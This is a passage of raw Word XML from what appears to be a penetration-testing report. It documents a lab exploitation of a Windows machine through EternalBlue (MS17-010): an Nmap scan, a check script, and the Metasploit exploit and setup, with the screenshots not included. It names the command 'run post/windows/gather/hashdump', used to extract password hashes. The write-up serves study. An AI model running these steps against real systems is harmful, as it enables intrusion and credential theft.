      </w:r>
      <w:r>
        <w:t>machine using the ip address of 192.168.1.10 as illustrated in</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07277">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00504D6A">
        <w:t>figure</w:t>
      </w:r>
      <w:r w:rsidR="00723DF3">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C263FF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00504D6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C263FF">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00504D6A">
        <w:t>he machine is using ‘smb 2.1’ which is vulnerable to MS17-010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C058E" w14:textId="525905DC" w:rsidR="00D07277" w:rsidRDefault="00504D6A" w:rsidP="002C7615">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C42BD70" wp14:editId="179FC559">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>421005</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2678126</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1288111" cy="389614"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="49" name="Rectangle 49"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1288111" cy="389614"/>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54935D" id="Rectangle 49" o:spid="_x0000_s1026" style="position:absolute;margin-left:33.15pt;margin-top:210.9pt;width:101.45pt;height:30.7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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D07277">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B047019" wp14:editId="633BEA60">
            <wp:extent cx="5009322" cy="5223100"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="48" name="Picture 4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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId101">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="779" r="1073" b="10607"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5010191" cy="5224007"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8C31E" w14:textId="220B4B84" w:rsidR="00D07277" w:rsidRDefault="00D07277" w:rsidP="00D07277">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="_Toc111363647"/>
      <w:bookmarkStart w:id="358" w:name="_Toc111363784"/>
      <w:bookmarkStart w:id="359" w:name="_Toc111981809"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>84</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Nmap scan of vulnerable machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>
      <w:bookmarkEnd w:id="358"/>
      <w:bookmarkEnd w:id="359"/>
    </w:p>
    <w:p w14:paraId="1DBD8A84" w14:textId="64C3117E" w:rsidR="00D07277" w:rsidRDefault="00D07277" w:rsidP="00D07277"/>
    <w:p w14:paraId="244F6113" w14:textId="3975396B" w:rsidR="00D07277" w:rsidRDefault="00504D6A" w:rsidP="0029310D">
      <w:r>
        <w:t>A script was downloaded from Github that</w:t>
      </w:r>
      <w:r w:rsidR="002C7615">
        <w:t xml:space="preserve"> would enable a test to be run that was specific to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ascertain if the target machine was vulnerable specifically to EternalBlue as set out in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F00C0A" w14:textId="6D799ED8" w:rsidR="00504D6A" w:rsidRDefault="00504D6A" w:rsidP="002C7615">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="115BC141" wp14:editId="17762E7F">
            <wp:extent cx="4836896" cy="1941095"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="50" name="Picture 5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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId102">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="5051" t="59902" r="21091" b="8608"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4882482" cy="1959389"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCFBBD4" w14:textId="549A7EB9" w:rsidR="002C7615" w:rsidRDefault="002C7615" w:rsidP="002C7615">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="360" w:name="_Toc111363648"/>
      <w:bookmarkStart w:id="361" w:name="_Toc111363785"/>
      <w:bookmarkStart w:id="362" w:name="_Toc111981810"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>85</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Download script from Github</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>
      <w:bookmarkEnd w:id="361"/>
      <w:bookmarkEnd w:id="362"/>
    </w:p>
    <w:p w14:paraId="39D3E9E2" w14:textId="6ED22175" w:rsidR="00504D6A" w:rsidRDefault="002C7615" w:rsidP="0029310D">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This script was then run as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>, showing that the target machine was vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC40D0" w14:textId="468D989F" w:rsidR="002C7615" w:rsidRDefault="002C7615" w:rsidP="00E84402">
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11BAEB33" wp14:editId="539F318F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>795922</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1066165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1085516" cy="331537"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="52" name="Rectangle 52"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1085516" cy="331537"/>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DF0A6A" id="Rectangle 52" o:spid="_x0000_s1026" style="position:absolute;margin-left:62.65pt;margin-top:83.95pt;width:85.45pt;height:26.1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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2116F88B" wp14:editId="0F3694FA">
            <wp:extent cx="4165349" cy="2807369"/>
            <wp:effectExtent l="0" t="0" r="698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03">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="1613" r="2578" b="7449"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4189740" cy="2823808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124EF6B" w14:textId="25B9514F" w:rsidR="00E84402" w:rsidRDefault="00E84402" w:rsidP="00E84402">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="363" w:name="_Toc111363649"/>
      <w:bookmarkStart w:id="364" w:name="_Toc111363786"/>
      <w:bookmarkStart w:id="365" w:name="_Toc111981811"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>86</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Target is confirmed vulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="363"/>
      <w:bookmarkEnd w:id="364"/>
      <w:bookmarkEnd w:id="365"/>
    </w:p>
    <w:p w14:paraId="0187CEC5" w14:textId="3827F597" w:rsidR="00E84402" w:rsidRDefault="00E84402" w:rsidP="00E84402">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70058249" w14:textId="3F725D67" w:rsidR="00E84402" w:rsidRPr="00E84402" w:rsidRDefault="00E84402" w:rsidP="00E84402">
      <w:r>
        <w:t xml:space="preserve">Metasploit was started as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00E76698">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A80FE9" w14:textId="6A621749" w:rsidR="00BC61F9" w:rsidRDefault="00BC61F9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50244068" w14:textId="5312B87B" w:rsidR="00E84402" w:rsidRDefault="00E84402" w:rsidP="00E84402">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B2E8703" wp14:editId="142B1008">
            <wp:extent cx="3288030" cy="3828716"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:docPr id="53" name="Picture 5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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId104">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1581" t="6927" r="10036" b="2855"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3289405" cy="3830317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="103C2A06" w14:textId="4877E3C3" w:rsidR="00E84402" w:rsidRDefault="00E84402" w:rsidP="00E84402">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="366" w:name="_Toc111363650"/>
      <w:bookmarkStart w:id="367" w:name="_Toc111363787"/>
      <w:bookmarkStart w:id="368" w:name="_Toc111981812"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="366"/>
      <w:bookmarkEnd w:id="367"/>
      <w:bookmarkEnd w:id="368"/>
    </w:p>
    <w:p w14:paraId="06112082" w14:textId="5AE9A40D" w:rsidR="00E84402" w:rsidRDefault="00E84402" w:rsidP="00E84402"/>
    <w:p w14:paraId="50475DA4" w14:textId="46DB7FDA" w:rsidR="00E84402" w:rsidRPr="00E84402" w:rsidRDefault="00E84402" w:rsidP="0029310D">
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00C263FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sets out the check for EternalBlue on the Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761CF625" w14:textId="130580C3" w:rsidR="00D07277" w:rsidRDefault="00D856A2" w:rsidP="00D856A2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D856A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA0F00E" wp14:editId="0702D72D">
            <wp:extent cx="5218163" cy="2369737"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="760259150" name="Picture 76025915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50" name="Picture 760259150" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5220916" cy="2370987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55298125" w14:textId="64C4D757" w:rsidR="00D856A2" w:rsidRDefault="00D856A2" w:rsidP="00D856A2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="_Toc111363651"/>
      <w:bookmarkStart w:id="370" w:name="_Toc111363788"/>
      <w:bookmarkStart w:id="371" w:name="_Toc111981813"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>88</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Check for EternalBlue in Metasploit Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
      <w:bookmarkEnd w:id="370"/>
      <w:bookmarkEnd w:id="371"/>
    </w:p>
    <w:p w14:paraId="3C2D847C" w14:textId="44DAEBDF" w:rsidR="00D856A2" w:rsidRDefault="00D856A2" w:rsidP="00D856A2">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D97A354" w14:textId="2A91F420" w:rsidR="00D856A2" w:rsidRDefault="00D856A2" w:rsidP="0029310D">
      <w:r>
        <w:t>The EternalBlue</w:t>
      </w:r>
      <w:r w:rsidR="009C6811">
        <w:t xml:space="preserve"> exploit was set up as illustr</w:t>
      </w:r>
      <w:r w:rsidR="00337C8C">
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="009C6811">
        <w:t xml:space="preserve">ed in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>89.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC311B" w14:textId="20B6F4C2" w:rsidR="00D856A2" w:rsidRDefault="00D856A2" w:rsidP="009C6811">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E8560C4" wp14:editId="0D9D93CA">
            <wp:extent cx="5373826" cy="601980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="57" name="Picture 5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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId106">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="20730"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5442764" cy="609702"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D86C5A" w14:textId="4B263C16" w:rsidR="009C6811" w:rsidRDefault="009C6811" w:rsidP="009C6811">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="_Toc111363652"/>
      <w:bookmarkStart w:id="373" w:name="_Toc111363789"/>
      <w:bookmarkStart w:id="374" w:name="_Toc111981814"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: EternalBlue exploit set up</w:t>
      </w:r>
      <w:bookmarkEnd w:id="372"/>
      <w:bookmarkEnd w:id="373"/>
      <w:bookmarkEnd w:id="374"/>
    </w:p>
    <w:p w14:paraId="3372CB85" w14:textId="43EB43A4" w:rsidR="00D856A2" w:rsidRDefault="009C6811" w:rsidP="009C6811">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The RHOST was set, and the exploit was run as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00E76698">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>. The creation of a ‘free hole adjacent to SMB2 buffer’ as outline</w:t>
      </w:r>
      <w:r w:rsidR="00723DF3">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in chapter 2.</w:t>
      </w:r>
      <w:r w:rsidR="000505CE">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be seen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E3CC7" w14:textId="35968AA0" w:rsidR="00D856A2" w:rsidRDefault="00823976" w:rsidP="000505CE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00823976">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B50E3AE" wp14:editId="193B75F6">
            <wp:extent cx="5227773" cy="4740051"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="760259163" name="Picture 76025916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63" name="Picture 760259163" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5227773" cy="4740051"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B7994" w14:textId="00452661" w:rsidR="000505CE" w:rsidRDefault="000505CE" w:rsidP="000505CE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="_Toc111363653"/>
      <w:bookmarkStart w:id="376" w:name="_Toc111363790"/>
      <w:bookmarkStart w:id="377" w:name="_Toc111981815"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>90</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: EternalBlue has established a connection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
      <w:bookmarkEnd w:id="376"/>
      <w:bookmarkEnd w:id="377"/>
    </w:p>
    <w:p w14:paraId="74621645" w14:textId="77777777" w:rsidR="000505CE" w:rsidRDefault="000505CE" w:rsidP="00823976">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4FCBF7" w14:textId="08B89B89" w:rsidR="00823976" w:rsidRPr="00823976" w:rsidRDefault="00EC08D3" w:rsidP="00823976">
      <w:r>
        <w:t xml:space="preserve">The command ‘run post/windows/gather/hashdump’ was used to gather information about the users on the target machine as set out in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2497FAAD" w14:textId="304F2BC4" w:rsidR="00D07277" w:rsidRDefault="007A3F2C" w:rsidP="00EC08D3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="684EBB1E" wp14:editId="406A9387">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>220980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1470660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5316855" cy="891540"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="760259166" name="Rectangle 760259166"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5316855" cy="891540"/>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DBC5B38" id="Rectangle 760259166" o:spid="_x0000_s1026" style="position:absolute;margin-left:17.4pt;margin-top:115.8pt;width:418.65pt;height:70.2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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
